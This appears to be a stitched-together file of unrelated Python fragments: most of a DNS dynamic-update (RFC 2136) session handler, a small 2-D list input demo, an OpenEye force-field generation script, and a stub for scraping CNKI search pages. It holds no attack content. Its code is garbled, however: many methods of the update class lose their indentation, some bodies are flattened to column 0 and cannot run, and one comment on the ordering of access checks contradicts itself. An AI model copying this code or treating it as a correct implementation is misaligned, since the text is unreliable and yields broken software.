        fields[2] = str(soa_num.get_value())
        new_soa = RRset(origin_soa.get_name(), origin_soa.get_class(),
                        RRType.SOA, origin_soa.get_ttl())
        new_soa.add_rdata(Rdata(origin_soa.get_type(), origin_soa.get_class(),
                                " ".join(fields)))
        return new_soa
    def soa_update_check(self, origin_soa, new_soa):
        '''Check whether the new soa is valid.

        Returns True iff the serial number of new_soa is bigger than that of
        origin_soa (serial-number arithmetic via the Serial class).  Make
        sure both parameters are not None before invoking this method.
        '''
        old_serial = self.__get_serial_internal(origin_soa)
        new_serial = self.__get_serial_internal(new_soa)
        return new_serial > old_serial
    def update_soa(self, origin_soa, inc_number = 1):
        '''Return origin_soa with its serial incremented by inc_number,
        following RFC 2136; a resulting serial of 0 is bumped to 1.

        origin_soa must exist and be non-None before this is invoked.
        '''
        serial = self.__get_serial_internal(origin_soa) + inc_number
        if serial.get_value() == 0:
            serial = serial + 1
        return self.__write_soa_internal(origin_soa, serial)
class UpdateSession:
    '''Protocol handling for a single dynamic update request (RFC 2136).

    This class is instantiated with a request message and some other
    information that will be used for handling the request. Its main
    method, handle(), will process the request, and normally build
    a response message according to the result. The application of this
    class can use the message to send a response to the client.
    '''
def __init__(self, req_message, client_addr, zone_config):
    '''Constructor.
    Parameters:
    - req_message (bundy.dns.Message) The request message. This must be
      in the PARSE mode, its Opcode must be UPDATE, and must have been
      TSIG validated if it's TSIG signed.
    - client_addr (socket address) The address/port of the update client
      in the form of Python socket address object. This is mainly for
      logging and access control.
    - zone_config (ZoneConfig) A tentative container that encapsulates
      the server's zone configuration. See zone_config.py.
    '''
    self.__message = req_message
    # TSIG record extracted once up front; reused by logging/ACL checks.
    self.__tsig = req_message.get_tsig_record()
    self.__client_addr = client_addr
    self.__zone_config = zone_config
    # SOA to be added to the diff, filled in later during update processing.
    self.__added_soa = None
def get_message(self):
    '''Return the update message.
    After handle() is called, it's generally transformed to the response
    to be returned to the client. If the request has been dropped,
    this method returns None. If this method is called before handle()
    the return value would be identical to the request message passed on
    construction, although it's of no practical use.
    '''
    return self.__message
def handle(self):
    '''Handle the update request according to RFC2136.
    This method returns a tuple of the following elements that
    indicate the result of the request.
    - Result code of the request processing, which are:
      UPDATE_SUCCESS Update request granted and succeeded.
      UPDATE_ERROR Some error happened to be reported in the response.
      UPDATE_DROP Error happened and no response should be sent.
      Except the case of UPDATE_DROP, the UpdateSession object will have
      created a response that is to be returned to the request client,
      which can be retrieved by get_message(). If it's UPDATE_DROP,
      subsequent call to get_message() returns None.
    - The name of the updated zone (bundy.dns.Name object) in case of
      UPDATE_SUCCESS; otherwise None.
    - The RR class of the updated zone (bundy.dns.RRClass object) in case
      of UPDATE_SUCCESS; otherwise None.
    - The name of the used data source associated with DataSourceClient
      in case of UPDATE_SUCCESS; otherwise None.
    '''
    try:
        self._get_update_zone()
        # Contrary to what RFC2136 specifies, we do ACL checks before
        # prerequisites. It's now generally considered to be a bad
        # idea, and actually does harm such as information
        # leak. It should make more sense to prevent any security issues
        # by performing ACL check as early as possible.
        self.__check_update_acl(self.__zname, self.__zclass)
        self._create_diff()
        prereq_result = self.__check_prerequisites()
        if prereq_result != Rcode.NOERROR:
            self.__make_response(prereq_result)
            return UPDATE_ERROR, self.__zname, self.__zclass, None
        update_result = self.__do_update()
        if update_result != Rcode.NOERROR:
            self.__make_response(update_result)
            return UPDATE_ERROR, self.__zname, self.__zclass, None
        # Both prerequisite and update checks passed: report success.
        self.__make_response(Rcode.NOERROR)
        datasrc_name = self.__datasrc_client.get_datasource_name()
        return UPDATE_SUCCESS, self.__zname, self.__zclass, datasrc_name
    except UpdateError as e:
        if not e.nolog:
            logger.debug(logger.DBGLVL_TRACE_BASIC,
                         LIBDDNS_UPDATE_PROCESSING_FAILED,
                         ClientFormatter(self.__client_addr, self.__tsig),
                         ZoneFormatter(e.zname, e.zclass), e)
        # If RCODE is specified, create a corresponding response and return
        # ERROR; otherwise clear the message and return DROP.
        if e.rcode is not None:
            self.__make_response(e.rcode)
            return UPDATE_ERROR, None, None, None
        self.__message = None
        return UPDATE_DROP, None, None, None
    except bundy.datasrc.Error as e:
        # Unexpected data source failure: report SERVFAIL to the client.
        logger.error(LIBDDNS_DATASRC_ERROR,
                     ClientFormatter(self.__client_addr, self.__tsig), e)
        self.__make_response(Rcode.SERVFAIL)
        return UPDATE_ERROR, None, None, None
def _get_update_zone(self):
    '''Parse the zone section and find the zone to be updated.
    If the zone section is valid and the specified zone is found in
    the configuration, sets private member variables for this session:
    __datasrc_client: A matching data source that contains the specified
                      zone
    __zname: The zone name as a Name object
    __zclass: The zone class as an RRClass object
    If this method raises an exception, these members are not set.
    Note: This method is protected for ease of use in tests, where
    methods are tested that need the setup done here without calling
    the full handle() method.
    '''
    # Validation: the zone section must contain exactly one question,
    # and it must be of type SOA.
    n_zones = self.__message.get_rr_count(SECTION_ZONE)
    if n_zones != 1:
        raise UpdateError('Invalid number of records in zone section: ' +
                          str(n_zones), None, None, Rcode.FORMERR)
    zrecord = self.__message.get_question()[0]
    if zrecord.get_type() != RRType.SOA:
        raise UpdateError('update zone section contains non-SOA',
                          None, None, Rcode.FORMERR)
    # See if we're serving a primary zone specified in the zone section.
    zname = zrecord.get_name()
    zclass = zrecord.get_class()
    zone_type, datasrc_client = self.__zone_config.find_zone(zname, zclass)
    if zone_type == bundy.ddns.zone_config.ZONE_PRIMARY:
        self.__datasrc_client = datasrc_client
        self.__zname = zname
        self.__zclass = zclass
        return
    elif zone_type == bundy.ddns.zone_config.ZONE_SECONDARY:
        # We are a secondary server; since we don't yet support update
        # forwarding, we return 'not implemented' (logged but not repeated
        # by the caller, hence nolog=True on the exception).
        logger.debug(DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_FORWARD_FAIL,
                     ClientFormatter(self.__client_addr, self.__tsig),
                     ZoneFormatter(zname, zclass))
        raise UpdateError('forward', zname, zclass, Rcode.NOTIMP, True)
    # zone wasn't found
    logger.debug(DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_NOTAUTH,
                 ClientFormatter(self.__client_addr, self.__tsig),
                 ZoneFormatter(zname, zclass))
    raise UpdateError('notauth', zname, zclass, Rcode.NOTAUTH, True)
    def _create_diff(self):
        '''
        Initializes the internal data structure used for searching current
        data and for adding and deleting data. This is supposed to be called
        after ACL checks but before prerequisite checks (since the latter
        needs the find calls provided by the Diff class).
        Adds the private member:
        __diff: A buffer of changes made against the zone by this update
                This object also contains find() calls, see documentation
                of the Diff class.
        Note: This method is protected for ease of use in tests, where
        methods are tested that need the setup done here without calling
        the full handle() method.
        '''
        # Journaling is enabled so the change is recorded; single-update
        # mode matches RFC2136-style processing (see Diff documentation).
        self.__diff = bundy.xfrin.diff.Diff(self.__datasrc_client,
                                            self.__zname,
                                            journaling=True,
                                            single_update_mode=True)
def __check_update_acl(self, zname, zclass):
'''Apply update ACL for the zone to be updated.'''
acl = self.__zone_config.get_update_acl(zname, zclass)
action = acl.execute(bundy.acl.dns.RequestContext(
(self.__client_addr[0], self.__client_addr[1]), self.__tsig))
if action == REJECT:
logger.info(LIBDDNS_UPDATE_DENIED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
raise UpdateError('rejected', zname, zclass, Rcode.REFUSED, True)
if action == DROP:
logger.info(LIBDDNS_UPDATE_DROPPED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
raise UpdateError('dropped', zname, zclass, None, True)
logger.debug(logger.DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_APPROVED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
    def __make_response(self, rcode):
        '''Transform the internal message into the update response.
        According to RFC2136 Section 3.8, the zone section is kept while
        the other sections are cleared; the response Rcode is set to the
        given value.
        '''
        self.__message.make_response()
        # SECTION_ZONE aliases the question section in this message.
        self.__message.clear_section(SECTION_ZONE)
        self.__message.set_rcode(rcode)
def __prereq_rrset_exists(self, rrset):
'''Check whether an rrset with the given name and type exists. Class,
TTL, and Rdata (if any) of the given RRset are ignored.
RFC2136 Section 2.4.1.
Returns True if the prerequisite is satisfied, False otherwise.
Note: the only thing used in the call to find() here is the
result status. The actual data is immediately dropped. As
a future optimization, we may want to add a find() option to
only return what the result code would be (and not read/copy
any actual data).
'''
result, _, _ = self.__diff.find(rrset.get_name(), rrset.get_type())
return result == ZoneFinder.SUCCESS
    def __prereq_rrset_exists_value(self, rrset):
        '''Check whether an rrset that matches name, type, and rdata(s) of the
           given rrset exists.
           RFC2136 Section 2.4.2
           Returns True if the prerequisite is satisfied, False otherwise.
           The rdata comparison is order-independent: the two rdata sets
           must be equal as multisets.
        '''
        result, found_rrset, _ = self.__diff.find(rrset.get_name(),
                                                  rrset.get_type())
        if result == ZoneFinder.SUCCESS and\
           rrset.get_name() == found_rrset.get_name() and\
           rrset.get_type() == found_rrset.get_type():
            # We need to match all actual RRs, unfortunately there is no
            # direct order-independent comparison for rrsets, so this
            # a slightly inefficient way to handle that.

            # shallow copy of the rdata list, so we are sure that this
            # loop does not mess with actual data.
            found_rdata = copy.copy(found_rrset.get_rdata())
            for rdata in rrset.get_rdata():
                if rdata in found_rdata:
                    found_rdata.remove(rdata)
                else:
                    return False
            # True only if every existing rdata was matched exactly once.
            return len(found_rdata) == 0
        return False
    def __prereq_rrset_does_not_exist(self, rrset):
        '''Check whether no rrsets with the same name and type as the given
           rrset exist.
           RFC2136 Section 2.4.3.
           Returns True if the prerequisite is satisfied, False otherwise.
           Simply the negation of __prereq_rrset_exists().
        '''
        return not self.__prereq_rrset_exists(rrset)
def __prereq_name_in_use(self, rrset):
'''Check whether the name of the given RRset is in use (i.e. has
1 or more RRs).
RFC2136 Section 2.4.4
Returns True if the prerequisite is satisfied, False otherwise.
Note: the only thing used in the call to find_all() here is
the result status. The actual data is immediately dropped. As
a future optimization, we may want to add a find_all() option
to only return what the result code would be (and not read/copy
any actual data).
'''
result, rrsets, flags = self.__diff.find_all(rrset.get_name())
if result == ZoneFinder.SUCCESS and\
(flags & ZoneFinder.RESULT_WILDCARD == 0):
return True
return False
    def __prereq_name_not_in_use(self, rrset):
        '''Check whether the name of the given RRset is not in use (i.e. does
           not exist at all, or is an empty nonterminal).
           RFC2136 Section 2.4.5.
           Returns True if the prerequisite is satisfied, False otherwise.
           Simply the negation of __prereq_name_in_use().
        '''
        return not self.__prereq_name_in_use(rrset)
def __check_in_zone(self, rrset):
'''Returns true if the name of the given rrset is equal to
or a subdomain of the zname from the Zone Section.'''
relation = rrset.get_name().compare(self.__zname).get_relation()
return relation == NameComparisonResult.SUBDOMAIN or\
relation == NameComparisonResult.EQUAL
    def __check_prerequisites(self):
        '''Check the prerequisites section of the UPDATE Message.
        RFC2136 Section 2.4.
        Returns a dns Rcode signaling either no error (Rcode.NOERROR)
        or that one of the prerequisites failed (any other Rcode).
        Exact-match (zone-class) prerequisites are collected first and
        checked together at the end, so that RRs of one rrset spread over
        several prerequisite records are compared as a whole.
        '''
        # Temporary array to store exact-match RRsets
        exact_match_rrsets = []

        for rrset in self.__message.get_section(SECTION_PREREQUISITE):
            # First check if the name is in the zone
            if not self.__check_in_zone(rrset):
                logger.info(LIBDDNS_PREREQ_NOTZONE,
                            ClientFormatter(self.__client_addr),
                            ZoneFormatter(self.__zname, self.__zclass),
                            RRsetFormatter(rrset))
                return Rcode.NOTZONE

            # Algorithm taken from RFC2136 Section 3.2
            if rrset.get_class() == RRClass.ANY:
                # Class ANY prerequisites must carry no TTL and no rdata.
                if rrset.get_ttl().get_value() != 0 or\
                   rrset.get_rdata_count() != 0:
                    logger.info(LIBDDNS_PREREQ_FORMERR_ANY,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                elif rrset.get_type() == RRType.ANY:
                    # "name is in use" prerequisite.
                    if not self.__prereq_name_in_use(rrset):
                        rcode = Rcode.NXDOMAIN
                        logger.info(LIBDDNS_PREREQ_NAME_IN_USE_FAILED,
                                    ClientFormatter(self.__client_addr),
                                    ZoneFormatter(self.__zname, self.__zclass),
                                    RRsetFormatter(rrset), rcode)
                        return rcode
                else:
                    # "rrset exists (value independent)" prerequisite.
                    if not self.__prereq_rrset_exists(rrset):
                        rcode = Rcode.NXRRSET
                        logger.info(LIBDDNS_PREREQ_RRSET_EXISTS_FAILED,
                                    ClientFormatter(self.__client_addr),
                                    ZoneFormatter(self.__zname, self.__zclass),
                                    RRsetFormatter(rrset), rcode)
                        return rcode
            elif rrset.get_class() == RRClass.NONE:
                # Class NONE prerequisites must carry no TTL and no rdata.
                if rrset.get_ttl().get_value() != 0 or\
                   rrset.get_rdata_count() != 0:
                    logger.info(LIBDDNS_PREREQ_FORMERR_NONE,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                elif rrset.get_type() == RRType.ANY:
                    # "name is not in use" prerequisite.
                    if not self.__prereq_name_not_in_use(rrset):
                        rcode = Rcode.YXDOMAIN
                        logger.info(LIBDDNS_PREREQ_NAME_NOT_IN_USE_FAILED,
                                    ClientFormatter(self.__client_addr),
                                    ZoneFormatter(self.__zname, self.__zclass),
                                    RRsetFormatter(rrset), rcode)
                        return rcode
                else:
                    # "rrset does not exist" prerequisite.
                    if not self.__prereq_rrset_does_not_exist(rrset):
                        rcode = Rcode.YXRRSET
                        logger.info(LIBDDNS_PREREQ_RRSET_DOES_NOT_EXIST_FAILED,
                                    ClientFormatter(self.__client_addr),
                                    ZoneFormatter(self.__zname, self.__zclass),
                                    RRsetFormatter(rrset), rcode)
                        return rcode
            elif rrset.get_class() == self.__zclass:
                # "rrset exists (value dependent)": TTL must be zero;
                # collect for the combined check after the loop.
                if rrset.get_ttl().get_value() != 0:
                    logger.info(LIBDDNS_PREREQ_FORMERR,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                else:
                    collect_rrsets(exact_match_rrsets, rrset)
            else:
                logger.info(LIBDDNS_PREREQ_FORMERR_CLASS,
                            ClientFormatter(self.__client_addr),
                            ZoneFormatter(self.__zname, self.__zclass),
                            RRsetFormatter(rrset))
                return Rcode.FORMERR

        # Check the collected exact-match prerequisites as whole rrsets.
        for collected_rrset in exact_match_rrsets:
            if not self.__prereq_rrset_exists_value(collected_rrset):
                rcode = Rcode.NXRRSET
                logger.info(LIBDDNS_PREREQ_RRSET_EXISTS_VAL_FAILED,
                            ClientFormatter(self.__client_addr),
                            ZoneFormatter(self.__zname, self.__zclass),
                            RRsetFormatter(collected_rrset), rcode)
                return rcode

        # All prerequisites are satisfied
        return Rcode.NOERROR
    def __set_soa_rrset(self, rrset):
        '''Sets the given rrset to the member __added_soa (which
           is used by __do_update for updating the SOA record).'''
        self.__added_soa = rrset
    def __do_prescan(self):
        '''Perform the prescan as defined in RFC2136 section 3.4.1.
        Validates every record in the update section and returns
        Rcode.NOERROR on success, or the appropriate error Rcode.
        Side effect: when the update section adds a SOA record, the
        (last) added SOA RR is stored in self.__added_soa via
        __set_soa_rrset(), so __do_update can later check and apply the
        serial.
        '''
        for rrset in self.__message.get_section(SECTION_UPDATE):
            if not self.__check_in_zone(rrset):
                logger.info(LIBDDNS_UPDATE_NOTZONE,
                            ClientFormatter(self.__client_addr),
                            ZoneFormatter(self.__zname, self.__zclass),
                            RRsetFormatter(rrset))
                return Rcode.NOTZONE
            if rrset.get_class() == self.__zclass:
                # Addition of records.
                # In fact, all metatypes are in a specific range,
                # so one check can test TKEY to ANY
                # (some value check is needed anyway, since we do
                # not have defined RRtypes for MAILA and MAILB)
                if rrset.get_type().get_code() >= 249:
                    logger.info(LIBDDNS_UPDATE_ADD_BAD_TYPE,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                if rrset.get_type() == RRType.SOA:
                    # In case there's multiple soa records in the update
                    # somehow, just take the last
                    for rr in foreach_rr(rrset):
                        self.__set_soa_rrset(rr)
            elif rrset.get_class() == RRClass.ANY:
                # Deletion of an rrset (or a whole name): TTL must be 0
                # and no rdata may be present.
                if rrset.get_ttl().get_value() != 0:
                    logger.info(LIBDDNS_UPDATE_DELETE_NONZERO_TTL,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                if rrset.get_rdata_count() > 0:
                    logger.info(LIBDDNS_UPDATE_DELETE_RRSET_NOT_EMPTY,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                # Metatypes are not deletable, except ANY (255), which
                # means "delete all types at this name".
                if rrset.get_type().get_code() >= 249 and\
                   rrset.get_type().get_code() <= 254:
                    logger.info(LIBDDNS_UPDATE_DELETE_BAD_TYPE,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
            elif rrset.get_class() == RRClass.NONE:
                # Deletion of individual RRs: TTL must be 0, metatypes
                # are not allowed.
                if rrset.get_ttl().get_value() != 0:
                    logger.info(LIBDDNS_UPDATE_DELETE_RR_NONZERO_TTL,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
                if rrset.get_type().get_code() >= 249:
                    logger.info(LIBDDNS_UPDATE_DELETE_RR_BAD_TYPE,
                                ClientFormatter(self.__client_addr),
                                ZoneFormatter(self.__zname, self.__zclass),
                                RRsetFormatter(rrset))
                    return Rcode.FORMERR
            else:
                logger.info(LIBDDNS_UPDATE_BAD_CLASS,
                            ClientFormatter(self.__client_addr),
                            ZoneFormatter(self.__zname, self.__zclass),
                            RRsetFormatter(rrset))
                return Rcode.FORMERR
        return Rcode.NOERROR
def __do_update_add_single_rr(self, rr, existing_rrset):
'''Helper for __do_update_add_rrs_to_rrset: only add the
rr if it is not present yet
(note that rr here should already be a single-rr rrset)
'''
if existing_rrset is None:
self.__diff.add_data(rr)
else:
rr_rdata = rr.get_rdata()[0]
if not rr_rdata in existing_rrset.get_rdata():
self.__diff.add_data(rr)
    def __do_update_add_rrs_to_rrset(self, rrset):
        '''Add the rrs from the given rrset to the internal diff.
           There is handling for a number of special cases mentioned
           in RFC2136;
           - If the addition is a CNAME, but existing data at its
             name is not, the addition is ignored, and vice versa.
           - If it is a CNAME, and existing data is too, it is
             replaced (existing data is deleted)
           An additional restriction is that SOA data is ignored as
           well (it is handled separately by the __do_update method).

           Note that in the (near) future, this method may have
           addition special-cases processing.
        '''
        # For a number of cases, we may need to remove data in the zone
        # (note; SOA is handled separately by __do_update, so that one
        # is explicitly ignored here)
        if rrset.get_type() == RRType.SOA:
            return
        result, orig_rrset, _ = self.__diff.find(rrset.get_name(),
                                                 rrset.get_type())
        if result == ZoneFinder.CNAME:
            # Ignore non-cname rrs that try to update CNAME records
            # (if rrset itself is a CNAME, the finder result would be
            # SUCCESS, see next case)
            return
        elif result == ZoneFinder.SUCCESS:
            # if update is cname, and zone rr is not, ignore
            if rrset.get_type() == RRType.CNAME:
                # Remove original CNAME record (the new one
                # is added below)
                self.__diff.delete_data(orig_rrset)
            # We do not have WKS support at this time, but if there
            # are special Update equality rules such as for WKS, and
            # we do have support for the type, this is where the check
            # (and potential delete) would go.
        elif result == ZoneFinder.NXRRSET:
            # There is data present, but not for this type.
            # If this type is CNAME, ignore the update
            if rrset.get_type() == RRType.CNAME:
                return
        # Add each RR individually, skipping exact duplicates of what is
        # already there (orig_rrset may be None for NXDOMAIN/NXRRSET).
        for rr in foreach_rr(rrset):
            self.__do_update_add_single_rr(rr, orig_rrset)
    def __do_update_delete_rrset(self, rrset):
        '''Deletes the rrset with the name and type of the given
           rrset from the zone data (by putting all existing data
           in the internal diff as delete statements).
           Special cases: if the delete statement is for the
           zone's apex, and the type is either SOA or NS, it
           is ignored.'''
        # find the rrset with local updates
        result, to_delete, _ = self.__diff.find_updated(rrset.get_name(),
                                                        rrset.get_type())
        if result == ZoneFinder.SUCCESS:
            if to_delete.get_name() == self.__zname and\
               (to_delete.get_type() == RRType.SOA or\
                to_delete.get_type() == RRType.NS):
                # ignore: apex SOA/NS must not be removed this way.
                return
            # Delete RR by RR so the diff stays in single-RR granularity.
            for rr in foreach_rr(to_delete):
                self.__diff.delete_data(rr)
    def __ns_deleter_helper(self, rrset):
        '''Special case helper for deleting NS resource records
           at the zone apex. In that scenario, the last NS record
           may never be removed (and any action that would do so
           should be ignored).
           NOTE(review): assumes the zone currently has an NS rrset at
           this name — the caller (__do_update_delete_rrs_from_rrset)
           only dispatches here for apex NS deletes; the find result
           code itself is not checked. Confirm a missing rrset cannot
           reach this point.
        '''
        # Find the current NS rrset, including local additions and deletions
        result, orig_rrset, _ = self.__diff.find_updated(rrset.get_name(),
                                                         rrset.get_type())

        # Even a real rrset comparison wouldn't help here...
        # The goal is to make sure that after deletion of the
        # given rrset, at least 1 NS record is left (at the apex).
        # So we make a (shallow) copy of the existing rrset,
        # and for each rdata in the to_delete set, we check if it wouldn't
        # delete the last one. If it would, that specific one is ignored.
        # If it would not, the rdata is removed from the temporary list
        orig_rrset_rdata = copy.copy(orig_rrset.get_rdata())
        for rdata in rrset.get_rdata():
            if len(orig_rrset_rdata) == 1 and rdata == orig_rrset_rdata[0]:
                # ignore: deleting this rdata would leave no NS record.
                continue
            else:
                # create an individual RRset for deletion
                to_delete = bundy.dns.RRset(rrset.get_name(),
                                            rrset.get_class(),
                                            rrset.get_type(),
                                            rrset.get_ttl())
                to_delete.add_rdata(rdata)
                orig_rrset_rdata.remove(rdata)
                self.__diff.delete_data(to_delete)
    def __do_update_delete_name(self, rrset):
        '''Delete all data at the name of the given rrset,
           by adding all data found by find_all as delete statements
           to the internal diff.
           Special case: if the name is the zone's apex, SOA and
           NS records are kept.
        '''
        # Find everything with the name, including local additions
        result, rrsets, flags = self.__diff.find_all_updated(rrset.get_name())
        # Wildcard-derived matches are not actual data at this name,
        # so they are not deleted.
        if result == ZoneFinder.SUCCESS and\
           (flags & ZoneFinder.RESULT_WILDCARD == 0):
            for to_delete in rrsets:
                # if name == self.__zname and type is soa or ns, don't delete!
                if to_delete.get_name() == self.__zname and\
                   (to_delete.get_type() == RRType.SOA or
                    to_delete.get_type() == RRType.NS):
                    continue
                else:
                    for rr in foreach_rr(to_delete):
                        self.__diff.delete_data(rr)
    def __do_update_delete_rrs_from_rrset(self, rrset):
        '''Deletes all resource records in the given rrset from the
           zone. Resource records that do not exist are ignored.
           If the rrset is of type SOA, it is ignored.
           Uses the __ns_deleter_helper if the rrset's name is the
           zone's apex, and the type is NS.
        '''
        # Delete all rrs in the rrset, except if name=self.__zname and type=soa, or
        # type = ns and there is only one left (...)

        # The delete does not want class NONE, we would not have gotten here
        # if it wasn't, but now is a good time to change it to the zclass.
        to_delete = convert_rrset_class(rrset, self.__zclass)

        if rrset.get_name() == self.__zname:
            if rrset.get_type() == RRType.SOA:
                # ignore: the apex SOA may not be deleted.
                return
            elif rrset.get_type() == RRType.NS:
                # hmm. okay. annoying. There must be at least one left,
                # delegate to helper method
                self.__ns_deleter_helper(to_delete)
                return
        for rr in foreach_rr(to_delete):
            self.__diff.delete_data(rr)
    def __update_soa(self):
        '''Checks the member value __added_soa, and depending on
           whether it has been set and what its value is, creates
           a new SOA if necessary.
           Then removes the original SOA and adds the new one,
           by adding the needed operations to the internal diff.
           Raises UpdateError with Rcode.SERVFAIL when the zone has no
           SOA record (broken datasource state).'''
        # Get the existing SOA
        # if a new soa was specified, add that one, otherwise, do the
        # serial magic and add the newly created one

        # get it from DS and to increment and stuff
        result, old_soa, _ = self.__diff.find(self.__zname, RRType.SOA,
                                              ZoneFinder.NO_WILDCARD |
                                              ZoneFinder.FIND_GLUE_OK)
        # We may implement recovering from missing SOA data at some point, but
        # for now servfail on such a broken state
        if result != ZoneFinder.SUCCESS:
            raise UpdateError("Error finding SOA record in datasource.",
                              self.__zname, self.__zclass, Rcode.SERVFAIL)
        serial_operation = DDNS_SOA()
        # Use the client-supplied SOA only if its serial passes the
        # RFC1982-style update check against the current one.
        if self.__added_soa is not None and\
           serial_operation.soa_update_check(old_soa, self.__added_soa):
            new_soa = self.__added_soa
        else:
            # increment goes here
            new_soa = serial_operation.update_soa(old_soa)

        self.__diff.delete_data(old_soa)
        self.__diff.add_data(new_soa)
    def __validate_error(self, reason):
        '''
        Error callback for check_zone() in __do_update: logs the
        validation failure *reason* for this zone.
        '''
        logger.error(LIBDDNS_ZONE_INVALID_ERROR, self.__zname, self.__zclass,
                     reason)
    def __validate_warning(self, reason):
        '''
        Warning callback for check_zone() in __do_update: logs the
        non-fatal validation issue *reason* for this zone.
        '''
        logger.warn(LIBDDNS_ZONE_INVALID_WARN, self.__zname, self.__zclass,
                    reason)
    def __do_update(self):
        '''Scan, check, and execute the Update section in the
        DDNS Update message.
        Returns an Rcode to signal the result (NOERROR upon success,
        any error result otherwise). The new zone content is validated
        with check_zone() before the diff is committed; a failed
        validation raises UpdateError with Rcode.REFUSED.
        '''
        # prescan
        prescan_result = self.__do_prescan()
        if prescan_result != Rcode.NOERROR:
            return prescan_result

        # update
        try:
            # Do special handling for SOA first
            self.__update_soa()

            # Algorithm from RFC2136 Section 3.4
            # Note that this works on full rrsets, not individual RRs.
            # Some checks might be easier with individual RRs, but only if we
            # would use the ZoneUpdater directly (so we can query the
            # 'zone-as-it-would-be-so-far'. However, due to the current use
            # of the Diff class, this is not the case, and therefore it
            # is easier to work with full rrsets for the most parts
            # (less lookups needed; conversion to individual rrs is
            # the same effort whether it is done here or in the several
            # do_update statements)
            for rrset in self.__message.get_section(SECTION_UPDATE):
                if rrset.get_class() == self.__zclass:
                    self.__do_update_add_rrs_to_rrset(rrset)
                elif rrset.get_class() == RRClass.ANY:
                    if rrset.get_type() == RRType.ANY:
                        self.__do_update_delete_name(rrset)
                    else:
                        self.__do_update_delete_rrset(rrset)
                elif rrset.get_class() == RRClass.NONE:
                    self.__do_update_delete_rrs_from_rrset(rrset)

            # Validate the would-be zone before committing anything.
            if not check_zone(self.__zname, self.__zclass,
                              self.__diff.get_rrset_collection(),
                              (self.__validate_error, self.__validate_warning)):
                raise UpdateError('Validation of the new zone failed',
                                  self.__zname, self.__zclass, Rcode.REFUSED)

            self.__diff.commit()
            return Rcode.NOERROR
        except UpdateError:
            # Propagate UpdateError exceptions (don't catch them in the
            # blocks below)
            raise
        except bundy.datasrc.Error as dse:
            logger.info(LIBDDNS_UPDATE_DATASRC_COMMIT_FAILED, dse)
            return Rcode.SERVFAIL
        except Exception as uce:
            # Catch-all so an unexpected bug results in SERVFAIL rather
            # than killing the session.
            logger.error(LIBDDNS_UPDATE_UNCAUGHT_EXCEPTION,
                         ClientFormatter(self.__client_addr),
                         ZoneFormatter(self.__zname, self.__zclass),
                         uce)
            return Rcode.SERVFAIL
|
# Interactive demo: show/edit one cell of a small 2-D list.
# BUG fix: the third row was [1.6,9] — a two-item row (typo for 1,6,9) that
# broke column indexing for column 2.
my2dlist=[[2,5,8],[3,7,4],[1,6,9],[4,2,0]]
userrow=int(input('what row do you want displayed'))
print(*my2dlist[userrow])
usercolumn=int(input('which column in this row do you want displayed'))
print(my2dlist[userrow][usercolumn])
# BUG fix: `.upper` was never called (a bound method never equals a string),
# and str.upper() yields 'YES', so the old comparison with "Yes" could never
# be true.
userchoice=input('do you want to chage that value').upper()
# Github is working with my new laptop - another test
if userchoice=="YES":
    replacement=int(input('what do you want to replace it with'))
    my2dlist[userrow][usercolumn]=replacement
    print(my2dlist[userrow][usercolumn])
|
from openmoltools import forcefield_generators
from openeye import oechem
def normalize_molecule(mol):
    """Normalize an OpenEye molecule in place and return it.

    Assigns aromaticity (OpenEye model), adds explicit hydrogens, and
    reassigns Tripos atom names when any atom name is empty. The molecule
    is also written to 'out.mol2' as a side effect.
    """
    # Assign aromaticity.
    oechem.OEAssignAromaticFlags(mol, oechem.OEAroModelOpenEye)
    # Add hydrogens.
    oechem.OEAddExplicitHydrogens(mol)
    # Check for any missing atom names, if found reassign all of them.
    if any([atom.GetName() == '' for atom in mol.GetAtoms()]):
        oechem.OETriposAtomNames(mol)
    # NOTE(review): the output path is hard-coded, so each call overwrites
    # 'out.mol2' and only the last molecule's dump survives — presumably
    # debug output; confirm whether this write is still needed.
    ofs = oechem.oemolostream('out.mol2')
    ofs.SetFormat(oechem.OEFormat_MOL2H)
    oechem.OEWriteMolecule(ofs, mol)
    ofs.close()
    return mol
def generate_forcefield(molecule_file, outfile):
    """Read molecules from *molecule_file*, normalize them, and write a
    generated force-field XML (ffxml) to *outfile*.
    """
    ifs = oechem.oemolistream()
    ifs.open(molecule_file)
    # get the list of molecules
    mol_list = [normalize_molecule(oechem.OEMol(mol)) for mol in ifs.GetOEMols()]

    # Each molecule gets a zero-padded 3-digit title used as its residue name.
    # TODO: HORRIBLE HACK ; WILL DIE AT > 999 RESIDUES!
    for idx, mol in enumerate(mol_list):
        mol.SetTitle("%03d" % idx)

    ffxml = forcefield_generators.generateForceFieldFromMolecules(mol_list, normalize=False)
    with open(outfile, 'w') as output_file:
        output_file.write(ffxml)
if __name__ == "__main__":
    import sys
    # CLI usage: <input molecule file> <output ffxml path>
    infile_name, outfile_name = sys.argv[1], sys.argv[2]
    generate_forcefield(infile_name, outfile_name)
|
import requests
from bs4 import BeautifulSoup
import socket
# Fetch CNKI (zhiwang) result pages for the keyword "artificial ground freezing" (人工冻结)
